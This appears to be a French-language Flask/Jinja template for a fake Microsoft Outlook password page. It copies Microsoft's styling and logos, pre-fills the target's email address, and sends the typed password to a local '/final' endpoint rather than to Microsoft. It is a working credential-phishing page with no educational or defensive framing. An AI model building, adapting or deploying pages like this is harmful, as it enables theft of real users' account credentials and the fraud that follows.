<!DOCTYPE html>
<html lang="fr">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Connexion Outlook</title>
  <link rel="icon" type="image/png" href="{{ url_for('static', filename='Logo Microsoft.png') }}">
  <style>
    html, body {
      margin: 0;
      padding: 0;
      height: 100%;
      font-family: "Segoe UI", sans-serif;
      background: linear-gradient(to bottom right, #f3f4f6, #e8ebee);
      display: flex;
      justify-content: center;
      align-items: center;
    }
    .login-container {
      text-align: center;
    }
    .login-box {
      background-color: #fff;
      width: 440px;
      padding: 40px 40px 30px;
      box-shadow: 0 0 10px rgba(0,0,0,0.1);
      margin: 0 auto;
    }
    .logo-title {
      font-size: 32px;
      font-weight: 400;
      color: #2b2b2b;
      margin-bottom: 25px;
    }
    .login-box img {
      height: 24px;
      margin-bottom: 8px;
      display: block;
    }
    .email {
      font-size: 14px;
      color: #1a1a1a;
      margin-bottom: 20px;
      text-align: left;
    }
    .login-box h2 {
      font-size: 18px;
      font-weight: 400;
      margin-bottom: 8px;
      color: #2b2b2b;
      text-align: left;
      
    }
    .login-box input[type="password"] {
      width: 100%;
      padding: 10px;
      font-size: 14px;
      border: none;
      border-bottom: 1px solid #8a8886;
      margin-bottom: 20px;
      outline: none;
    }
    .login-box input[type="password"]:focus {
      border-bottom: 2px solid #0078D4;
    }
    .login-box button {
      background-color: #0078D4;
      color: white;
      padding: 10px 18px;
      border: none;
      font-size: 14px;
      cursor: pointer;
      margin-top: 5px;
      float: right;
    }
    .login-box a {
      display: block;
      font-size: 13px;
      color: #0078D4;
      text-decoration: none;
      margin-top: 8px;
      text-align: left;
    }
    .login-box a:hover {
      text-decoration: underline;
    }
  </style>
</head>
<body>
  <div class="login-container">
    <div class="logo-title">
        <img src="https://aadcdn.msauth.net/shared/1.0/content/images/applogos/53_7a3c80bf9694448bac31a9589d2e9e92.png" alt="Outlook" height="32">
      </div>      
    <div class="login-box">
      <img src="https://logincdn.msftauth.net/shared/5/images/microsoft_logo_ee5c8d9fb6248c938fd0.svg" alt="Microsoft">
      <div class="email">{{ email }}</div>
      <h2>Entrez le mot de passe</h2>
      <form action="/final" method="POST">
        <input type="hidden" name="email" value="{{ email }}">
        <input type="password" name="password" placeholder="Mot de passe" required>
        <button type="submit">Se connecter</button>
      </form>
      <a href="#">J'ai oublié mon mot de passe</a>
      <a href="#">Se connecter avec un autre compte</a>
    </div>
  </div>
</body>
</html>